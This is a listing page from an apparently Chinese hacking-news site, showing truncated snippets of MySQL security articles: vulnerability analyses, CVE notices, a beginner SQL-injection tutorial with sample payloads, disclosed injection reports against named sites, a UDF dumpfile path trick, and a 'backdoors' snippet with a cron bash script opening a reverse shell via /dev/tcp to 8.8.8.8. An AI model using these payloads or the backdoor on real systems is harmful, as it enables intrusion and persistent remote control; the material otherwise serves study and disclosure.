记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

MySQL mmm_agent远程代码注入漏洞分析

概述MySQL Master-Master Replication Manager (MMM) mmm_agentd daemon 2.2.1发现多个可利用的远程代码注入漏洞。一般mmm_agentd不会以root权限运行,默认情况下也不需要认证。攻击者伪造一个特殊的MMM协议消息可以造成shell命令注入,导致以mmm_agentd process任意命令执行。攻击者可以用含有mmm_agented的TCP session来触发这些漏洞。漏洞详情MMM即MySQL的多主复制管理工具,提供给MySQL数据库集群很高的可用性。在MMM环境中,每个MySQL服务器主机运行在mmm_agentd代理之上。在默认配置中,mmm
发布时间:2018-05-11 12:20 | 阅读:102526 | 评论:0 | 标签:漏洞 MySQL 注入

新手科普 | MySQL手工注入之基本注入流程

MySQL手工注入的基本步骤以及一些技巧的记录,当出现学习手工注入的时候,网上的文章参差不齐,导致很长一段时间对手工注入的理解一直处于一知半解的状态,特此记录本文,让小白们少走些弯路。本文只针对手工注入小白,大牛绕过轻喷。 步骤 注释或者闭合语句 首先看下一个基本的SQL语句查询源码: $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";   下面的步骤默认都是采用这种基本的SQL语句的,其他的注入方法换汤不换药,这里只是想整理下注入的步骤与关键性的语句。 引号闭合语句 id =1 ' and '1' ='1 带入进源码中的SQL语句就是: SELECT * FROM users WHERE id='1 ' and '1' ='1' LIMI
发布时间:2018-01-21 19:45 | 阅读:145068 | 评论:0 | 标签:WEB安全 mysql 手工注入 注入

各类后门整理!【白帽黑客必备生存技能】

Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。 利用方法 先创建 /etc/xxxx 脚本文件(名字自己改),利用该脚本进行反弹。以下脚本代表全自动反弹到 8.8.8.8 的 53 端口。 nano /etc/xxxx #!/bin/bash if netstat -ano|grep -v grep | grep "8.8.8.8">/dev/null then echo "OK">/dev/null else /sbin/iptables --policy INPUT ACCEPT /sbin/iptables --policy OUTPUT ACCEPT bash -i >& /dev/tcp
发布时间:2017-08-04 00:30 | 阅读:113677 | 评论:0 | 标签:专栏 mysql 后门

windows修改mysql root空密码

有时候mysql的root密码是空密码。这样造成很大的安全隐患。首先停止mysql服务。在命令行下修改mysql密码的情况下会提示:access denied for user ”@’localhost’ to database 这种情况只需要cmd路径切换到mysql的bin目录下,执行mysqld –defaults-file=”D:MySQLmy.ini” –console –skip-grant-tables再开一个dos窗口,同样切到mysql bin目录下,mysql -u root mysql进去了mysql提示符。mysql> update user set password=PASSWORD(
发布时间:2017-07-14 16:15 | 阅读:51354 | 评论:0 | 标签:MySQL

【黑客解析】黑客是如何实现数据库勒索的?

每一次重要通用漏洞的爆发总是会带来一片腥风血雨,任何微小的漏洞,基于43亿IPv4地址这个大基数,总是可以被放大!从MongoDB开始到MySQL,黑客瞄准了数据库服务,通过黑客手段获取数据库服务的权限,然后删除数据,在数据库中插入勒索信息,要求支付比特币以赎回数据(可见扩展阅读)。那么黑客是如何实现这整个过程?MongoDB勒索事件在MongoDB的勒索事件里,黑客攻击通过攻击存在未授权访问问题的MongoDB数据库,加密原数据内容,在数据库中插入勒索信息,要求支付比特币以赎回数据。在这个事件中,我们来还原下黑客是怎么实现这个流程的:大概是这样一个流程,通过探测互联网上符合的目标,然后使用对应的攻击脚本针对探测得到的目标实现自动化的攻击。而细化到具体的探测目标和Exp的功能,以MongoDB数据勒索这个例子,
发布时间:2017-03-10 19:55 | 阅读:143753 | 评论:0 | 标签:技术 MongoDB MySQL

Feigong:针对各种情况自由变化的MySQL注入脚本

项目主页 https://github.com/LoRexxar/Feigong 简介 在sqlmap的使用过程中,常常碰到很普通的绕过过滤方式,例如空格–>%0b、%0a,但是却没办法使用sqlmap来获取数据的情况,于是花了很长时间来完善脚本,让非攻可以通过修改config.py一个文件中的设置,让非攻在面对不同情况时成为了灵活多变的注入脚本… 非攻目前集成了对mysql的normal、build、time,3种注入方式… 在使用非攻之前 1、首先你需要找到一个注入点(在考虑写一个这样的工具) 2、判断数据库为mysql 3、通过巧妙地过滤可以获取数据 4、开始使用非攻 TODO 添加线程池优化注入速度 完善对拓展函数的支持 增加更多注入语句 增加更多绕过过滤方式
发布时间:2016-11-27 07:30 | 阅读:130753 | 评论:0 | 标签:工具 Feigong MYSQL MySQL注入 MySQL注入脚本 注入

php代码审计基础

1.session本地浏览器中的变量,是可控的.PHP中还有一个变量$_session每个访问者的sessionID是不同的.这个值就用来区分每个用户.PHPSESSID=cmebf7jkflu5a31vf67kbiopk42.$_files 上传变量包含了:js验证,扩展名验证,MIME验证,目录验证js验证简单,不加载就可以了。扩展名验证, 如php,php3MIME验证, text/phpdemo: if (($_FILES['upfile']['type'] == 'image/gif') || ($_FILES['upfile']['type'] == 'image/jpeg')目录验证,利用iis6的特殊解析,这里主讲php,就不细说了。3数字型注射直接使用intval($_GET[id]),强制转
发布时间:2016-11-18 04:20 | 阅读:116152 | 评论:0 | 标签:Code MySQL PHP

UDF导出路径创建命令

总是搜索复制的好麻烦,干脆写在博客了。select ‘test’ into dumpfile ‘C:\MySQLpath\lib::$INDEX_ALLOCATION’;select ‘test’ into dumpfile ‘C:\MySQLpath\lib\plugin::$INDEX_ALLOCATION’;ERROR 3 (HY000): Error writing file ‘C:MySQLlib::$INDEX_ALLOCATION’ (Errcode: 22)目录已经创建了这个不用担心,目录已经创建了
发布时间:2016-11-18 04:20 | 阅读:72067 | 评论:0 | 标签:MySQL

mysql几个命令

查询指定列记录查询admin表的admin的密码SELECT password FROM admin WHERE username =’admin‘在uid、username插入数据:INSERT INTO bbs.uc_admins(uid,username) VALUES(‘2‘,’test‘)mysql全数据库搜索:select * from INFORMATION_SCHEMA.columns where COLUMN_NAME Like ‘%world%’;
发布时间:2016-11-18 04:20 | 阅读:81136 | 评论:0 | 标签:MySQL

无需密码攻击 SQL Server 的几种思路

把SQL服务器黑了是件很有趣的事儿。今年的时候,我发布过一篇有关于《无需密码黑掉mssql服务器》的文章。我利用Ettercap制作了一个中间人攻击,并将它放在了微软SQL服务器和用户之间。利用Ettercap过滤器,我展示了如何立刻将SQL的查询替换成你自己的恶意查询。这允许你去运行一系列的攻击,比如创建一个数据库的管理员用户来帮助你获得数据或者执行功能。我写了一个脚本来使得整个过程能够更加自动化,给大家学习使用。 当脚本工作时,它会有一些限制。第一,你必须知道数据库正在运行的SQL查询。一般来讲,你不大可能有这样的信息。第二,脚本依赖于Ettercap来运行MITM攻击。最后,它只支持微软SQL服务器。虽然它是一个很流行的数据库引擎,但它只代表了数据库种类中的一小部分。 在最近的一个对于Anitian用户
发布时间:2016-09-26 20:55 | 阅读:132147 | 评论:0 | 标签:Web安全 ARP ettercap MITM攻击 mssql MYSQL oracle postgersql Scap

关于MySQL数据库漏洞情况的通报

近日,互联网上披露了关于MySQL数据库存在代码执行漏洞(CNNVD-201609-183)的情况。由于MySQL数据库默认配置存在一定缺陷,导致攻击者可利用该漏洞对数据库配置文件进行篡改,进而以管理员权限执行任意代码,远程控制受影响服务器。目前,Oracle官方网站发布声明将于10月发布关键补丁更新信息。 一、漏洞简介 Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统。 MySQL数据库中的配置文件(my.cnf)存在远程代码执行漏洞(漏洞编号:CNNVD-201609-183,CVE-2016-6662),以下版本受到该漏洞影响:MySQL 5.7.15及之前的版本,5.6.33及之前的版本,5.5.52及之前的版本。 CNNVD针对上述漏洞的利用原理进行梳理,总结如
发布时间:2016-09-13 21:15 | 阅读:93148 | 评论:0 | 标签:威胁情报 MySQL Oracle 数据库漏洞 漏洞

漏洞预警:MySQL代码执行0-day漏洞 可本地提权

来自波兰的安全研究人员Dawid Golunski刚刚发现了两个MySQL的0-day漏洞,影响到所有版本分支、默认配置的MySQL服务器(5.7、5.6和5.5),包括最新版本。攻击者可以远程和本地利用漏洞。攻击者成功利用漏洞后,可以ROOT权限执行代码,完全控制MySQL数据库。攻击者仅需有FILE权限即可实现ROOT提权,进而控制服务器。漏洞编号:CVE-2016-6662与CVE-2016-6663漏洞影响:MySQL  <= 5.7.15       远程代码执行/ 提权 (0day)       5.6.33       5.5.52MySQL分支亦受影
发布时间:2016-09-13 13:35 | 阅读:104076 | 评论:0 | 标签:漏洞 0day mysql 提权

MySql InnoDb还原工具

通过任意文件下载找到了mysql的备份,表类型是独享式innodb,由一个frm文件和一个ibd文件组成。 本以为直接复制到本地的mysql数据目录中即可恢复数据,但在查询时却发现并不如所愿:mysql> select * from admin; ERROR 1146 (42S02): Table 'test.admin' doesn't exist mysql> show tables; +----------------+ | Tables_in_test | +----------------+ | admin | +----------------+ 1 row in set (0.00 sec)查找资料得知,innodb的表信息存放于datadir下面的i
发布时间:2016-02-22 20:15 | 阅读:115452 | 评论:0 | 标签:数据库 mysql

恶意软件感染MySQL服务器 成DDoS僵尸网络一部分

赛门铁克已经发现攻击者使用恶意软件劫持MySQL服务器,将其加入全球DDoS僵尸网络,进而发动DDoS攻击。据赛门铁克公司介绍,攻击者可以利用SQL注入(仍未经证实的),使用一个特制的UDF(用户定义函数)文件感染MySQL服务器,然后在服务器上保存Downloader.Chikdos木马。 由于UDF文件可以让MySQL服务器启动更复杂的操作,而普通的SQL命令没有访问权限,攻击者调用UDF文件,然后下载更危险的名为Trojan.Chikdos.A的木马。该木马是Trojan.Chikdos恶意软件的变种,专门进行DDoS攻击。 赛门铁克建议MySQL服务器管理员应该在Lib、Libplugin和Bin文件夹当中寻找随机命名的dll文件,以确定MySQL服务器是否已经被感染。赛门铁克证实了这个漏洞正在被黑客广
发布时间:2015-10-30 08:00 | 阅读:72982 | 评论:0 | 标签:安全 DDOS mysql 恶意软件 ddos

中关村在线某站SQL注射漏洞

漏洞标题 中关村在线某站SQL注射漏洞 相关厂商 中关村在线 漏洞作者 BeenQuiver 提交时间 2015-09-08 16:37 公开时间 2015-09-08 17:52 漏洞类型 SQL注射漏洞 危害等级 高 自评Rank 20 漏洞状态 厂商已经修复 Tags标签 注射技巧,Mysql 漏洞详情 http://m.zol.com.cn/查看更多评论处,ajax包存在sql注入漏洞 GET /article/ajax_comment_new.php?id=2611842&page=2&h= HTTP/1.1 Host: m.zol.com.cn Proxy-Connection: keep-alive User-Agent: Mozi
发布时间:2015-09-08 21:35 | 阅读:108829 | 评论:0 | 标签:漏洞 Mysql 注射技巧

福建网龙某站SQL盲注影响核心数据DBA权限

漏洞标题 福建网龙某站SQL盲注影响核心数据DBA权限 相关厂商 福建网龙 漏洞作者 路人甲 提交时间 2015-06-01 11:41 公开时间 2015-07-16 20:08 漏洞类型 SQL注射漏洞 危害等级 高 自评Rank 20 漏洞状态 厂商已经确认 Tags标签 注射技巧,Mysql 漏洞详情 http://www.ln86e.com/Shequ/Search.aspx?page=1&SearchTxt=1&tag=1 搜索关键字 漏洞证明: --- Parameter: SearchTxt (GET) Type: boolean-based blind Title: OR boolean-b
发布时间:2015-07-17 11:10 | 阅读:88331 | 评论:0 | 标签:漏洞 Mysql 注射技巧

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云